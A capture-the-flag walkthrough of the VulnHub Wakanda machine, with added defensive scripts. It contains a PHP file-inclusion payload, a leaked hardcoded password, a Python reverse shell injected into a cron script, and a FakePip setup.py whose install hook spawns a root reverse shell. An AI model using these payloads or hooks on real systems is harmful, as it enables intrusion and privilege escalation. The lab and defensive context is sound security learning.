vulnhub-wakanda

Target IP: 192.168.56.101

nmap scan

root@kali:~# nmap -sV -A 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-26 07:50 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.55% done
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 9.20% done; ETC: 07:51 (0:00:39 remaining)
Nmap scan report for 192.168.56.101
Host is up (0.32s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Vibranium Market
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 46692/tcp status
|_ 100024 1 55917/udp status
514/tcp filtered shell
3333/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 1c:98:47:56:fc:b8:14:08:8f:93:ca:36:44:7f:ea:7a (DSA)
| 2048 f1:d5:04:78:d3:3a:9b:dc:13:df:0f:5f:7f:fb:f4:26 (RSA)
| 256 d8:34:41:5d:9b:fe:51:bc:c6:4e:02:14:5e:e1:08:c5 (ECDSA)
|_ 256 0e:f5:8d:29:3c:73:57:c7:38:08:6d:50:84:b6:6c:27 (EdDSA)
Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (99%), DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (98%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (96%), Linux 4.4 (96%), Microsoft Windows XP SP3 (96%), BlueArc Titan 2100 NAS device (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 3.82 ms 192.168.214.2
2 -- 192.168.56.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.53 seconds

Port 80 is open.

The home page is a very simple PHP page.

An HTML comment reveals ?lang=fr.

Brute-forcing with DirBuster shows that fr.php exists.

This looks like a file inclusion; passing index directly returns a 500.

Using the PHP filter wrapper:

?lang=php://filter/read=convert.base64-encode/resource=index

returns the source as base64.

Decoding gives:

<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>



<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="Vibranium market">
<meta name="author" content="mamadou">

<title>Vibranium Market</title>


<link href="bootstrap.css" rel="stylesheet">


<link href="cover.css" rel="stylesheet">
</head>

<body class="text-center">

<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<header class="masthead mb-auto">
<div class="inner">
<h3 class="masthead-brand">Vibranium Market</h3>
<nav class="nav nav-masthead justify-content-center">
<a class="nav-link active" href="#">Home</a>
<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
</nav>
</div>
</header>

<main role="main" class="inner cover">
<h1 class="cover-heading">Coming soon</h1>
<p class="lead">
<?php
if (isset($_GET['lang']))
{
echo $message;
}
else
{
?>

Next opening of the largest vibranium market. The products come directly from the wakanda. stay tuned!
<?php
}
?>
</p>
<p class="lead">
<a href="#" class="btn btn-lg btn-secondary">Learn more</a>
</p>
</main>

<footer class="mastfoot mt-auto">
<div class="inner">
<p>Made by<a href="#">@mamadou</a></p>
</div>
</footer>
</div>





</body></html>
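The include($_GET['lang'].".php") above accepts any string, so the wrapper payload leaves a clear trace in the access log. As an added example that is not part of the original writeup, this script scans constructed Apache log lines (line 2 is the exact payload used above) and flags every ?lang= value that is not one of the site's real language files; the allow-list {"fr", "en"} is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Language files that actually exist on the site (assumption: fr.php plus a default).
ALLOWED_LANGS = {"fr", "en"}

# Constructed Apache combined-format lines; line 2 is the exact payload used above.
SAMPLE_LOG = """\
192.168.56.1 - - [26/Sep/2018:07:55:01 -0400] "GET /?lang=fr HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
192.168.56.1 - - [26/Sep/2018:07:56:12 -0400] "GET /?lang=php://filter/read=convert.base64-encode/resource=index HTTP/1.1" 200 3211 "-" "Mozilla/5.0"
192.168.56.1 - - [26/Sep/2018:07:56:40 -0400] "GET /?lang=../../../../etc/passwd%00 HTTP/1.1" 500 - "-" "curl/7.61.0"
192.168.56.1 - - [26/Sep/2018:07:57:03 -0400] "GET /?lang=php%3A%2F%2Finput HTTP/1.1" 200 812 "-" "curl/7.61.0"
192.168.56.1 - - [26/Sep/2018:07:57:30 -0400] "GET /bootstrap.css HTTP/1.1" 200 140930 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)  # php://, data://, expect:// ...

def classify_lang(value):
    """Return None if the value is an allowed language, else a reason string."""
    v = unquote(unquote(value))  # collapse double URL-encoding such as %253A
    if v in ALLOWED_LANGS:
        return None
    if WRAPPER_RE.match(v):
        return "stream wrapper"
    if ".." in v or "/" in v or "\\" in v:
        return "path traversal"
    if "\x00" in v:
        return "null byte"
    return "unknown lang value"

def scan_access_log(text):
    """Return [(line_no, lang_value, reason)] for suspicious ?lang= requests."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get("lang", []):
            reason = classify_lang(value)
            if reason:
                findings.append((n, value, reason))
    return findings

if __name__ == "__main__":
    for n, value, reason in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {reason}: lang={value!r}")
```

The same allow-list comparison is the fix on the PHP side: only include a file when the parameter matches a known language name.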

The source plainly gives a password, along with a name, mamadou. SSH is open, so these are probably SSH credentials.

ssh mamadou@192.168.56.101 -p 3333

Login succeeds, but the shell turns out to be a Python interpreter.

import pty
pty.spawn("/bin/sh")

That drops into a regular shell.

mamadou@Wakanda1:~$ cat flag1.txt

Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc

Moving on to flag2: it is in devops's home directory, which the current user has no permission to read.

find / -user devops 2>/dev/null

This turns up /tmp/test and /srv/.antivirus.py.

mamadou@Wakanda1:~$ ls -l /srv/.antivirus.py
-rw-r--rw- 1 devops developer 247 Sep 26 10:05 /srv/.antivirus.py

And this .py file is writable by the current user.

cat shows it simply writes "test" into /tmp/test.

Running stat /tmp/test shows the file was modified within the last five minutes, so the .py file is presumably being run on a schedule.

Write a reverse shell into the .py file, start a listener in another terminal beforehand, and after a short wait a shell comes back.

open('/tmp/test','w').write('test')
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("127.0.0.1",7777))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
mamadou@Wakanda1:~$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 57176
/bin/sh: 0: can't access tty; job control turned off
$ whoami
devops
$ cd ~
$ ls
flag2.txt
$ cat flag2.txt
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
$ id
uid=1001(devops) gid=1002(developer) groups=1002(developer)
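The escalation to devops worked only because a script run on a schedule (/srv/.antivirus.py, mode -rw-r--rw-) could be edited by a different user. As an added example that is not from the writeup, this audit function reports every way a non-owner could alter such a script, including a writable parent directory, and the demo recreates the page's 0646 mode on temporary files instead of touching /srv.

```python
import os
import stat
import tempfile

def writable_by_others(path):
    """List the ways a non-owner could change what this scheduled script does."""
    st = os.stat(path)
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("file is world-writable")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("file is group-writable")
    # A writable, non-sticky parent lets anyone delete and recreate the file,
    # so the file's own mode bits are not enough on their own.
    parent = os.path.dirname(os.path.abspath(path))
    pmode = os.stat(parent).st_mode
    if pmode & stat.S_IWOTH and not pmode & stat.S_ISVTX:
        reasons.append("parent directory is world-writable without the sticky bit")
    return reasons

def demo():
    """Recreate the -rw-r--rw- mode listed for /srv/.antivirus.py on temp files."""
    with tempfile.TemporaryDirectory() as d:  # created 0700, so the parent check stays clean
        bad = os.path.join(d, ".antivirus.py")
        good = os.path.join(d, "antivirus-fixed.py")
        for p in (bad, good):
            with open(p, "w") as f:
                f.write("open('/tmp/test','w').write('test')\n")  # same body as the cron script
        os.chmod(bad, 0o646)   # -rw-r--rw-, as shown by ls -l above
        os.chmod(good, 0o644)  # -rw-r--r--, writable by the owner only
        return writable_by_others(bad), writable_by_others(good)

if __name__ == "__main__":
    bad, good = demo()
    print("0646:", bad or "ok")
    print("0644:", good or "ok")
```

Run the check over the command paths in /etc/crontab and /etc/cron.d on a real host; any finding means a lower-privileged user decides what the scheduled job executes.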
$ sudo -l
Matching Defaults entries for devops on Wakanda1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User devops may run the following commands on Wakanda1:
(ALL) NOPASSWD: /usr/bin/pip

sudo -l lists the commands that can be run with sudo, and pip is among them.

A fake package can be used to spawn a shell: https://github.com/0x00-0x00/FakePip

from setuptools import setup
from setuptools.command.install import install
import base64
import os


# setup.py install hook; under sudo pip it runs as root
class CustomInstall(install):
    def run(self):
        install.run(self)
        RHOST = '127.0.0.1' # change this

        reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 4433; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOST
        encoded = base64.b64encode(reverse_shell)
        os.system('echo %s|base64 -d|bash' % encoded)


setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='andre.marques@esecurity.com.br',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

Change the host and port, start nc listening beforehand, then run sudo /usr/bin/pip install . --upgrade --force-reinstall to get a root shell.

$ sudo /usr/bin/pip install . --upgrade --force-reinstall
Unpacking /home/devops/fakepip
Running setup.py (path:/tmp/pip-4QVO0b-build/setup.py) egg_info for package from file:///home/devops/fakepip

Installing collected packages: FakePip
Found existing installation: FakePip 0.0.1
Uninstalling FakePip:
Successfully uninstalled FakePip
Running setup.py install for FakePip
mamadou@Wakanda1:~$ nc -lvnp 4433
listening on [any] 4433 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 52106
root@Wakanda1:/tmp/pip-4QVO0b-build# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Wakanda1:/tmp/pip-4QVO0b-build# cd ~
cd ~
root@Wakanda1:~# ls
ls
root.txt
root@Wakanda1:~# cat root.txt
cat root.txt
_ _.--.____.--._
( )=.-":;:;:;;':;:;:;"-._
\\\:;:;:;:;:;;:;::;:;:;:\
\\\:;:;:;:;:;;:;:;:;:;:;\
\\\:;::;:;:;:;:;::;:;:;:\
\\\:;:;:;:;:;;:;::;:;:;:\
\\\:;::;:;:;:;:;::;:;:;:\
\\\;;:;:_:--:_:_:--:_;:;\
\\\_.-" "-._\
\\
\\
\\
\\ Wakanda 1 - by @xMagass
\\
\\


Congratulations You are Root!

821ae63dbe0c573eff8b69d451fb21bc
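The root cause of the last step is the sudoers rule itself: a NOPASSWD entry for a binary that runs caller-supplied code (pip executes setup.py). As an added example that is not part of the writeup, this script parses the sudo -l output shown earlier and flags such rules; the systemctl rule in the sample is constructed for contrast, and the CODE_RUNNERS list is an assumption to be extended per site.

```python
import os
import re

# Binaries whose ordinary operation runs code chosen by the caller.
CODE_RUNNERS = {"pip", "pip2", "pip3", "python", "python2", "python3", "perl",
                "ruby", "bash", "sh", "vi", "vim", "less", "find", "env", "make"}

# One rule line of `sudo -l`: "(runas) [TAG: ...] command[, command...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# The sudo -l output from the writeup above; the systemctl rule is constructed for contrast.
SUDO_L = """\
Matching Defaults entries for devops on Wakanda1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User devops may run the following commands on Wakanda1:
    (ALL) NOPASSWD: /usr/bin/pip
    (root) /usr/bin/systemctl restart apache2
"""

def parse_sudo_rules(text):
    """Return [(runas, nopasswd, command)] for every rule after the 'may run' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas"), nopasswd, cmd.strip()))
    return rules

def risky_rules(rules):
    """Password-less rules that hand over code execution as another user."""
    out = []
    for runas, nopasswd, cmd in rules:
        prog = os.path.basename(cmd.split()[0]) if cmd else ""
        if nopasswd and (cmd == "ALL" or "*" in cmd or prog in CODE_RUNNERS):
            out.append((runas, cmd))
    return out

if __name__ == "__main__":
    for runas, cmd in risky_rules(parse_sudo_rules(SUDO_L)):
        print(f"review: ({runas}) NOPASSWD: {cmd}")
```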

I only finished this by following a video and a writeup; it is not hard, but I did run into some problems:

  • PHP file inclusion vulnerability
  • Python terminal with no shell: python -c 'import pty; pty.spawn("/bin/sh")'
  • A file owned by another user that can be modified
  • sudo -l shows pip is allowed: https://github.com/0x00-0x00/FakePip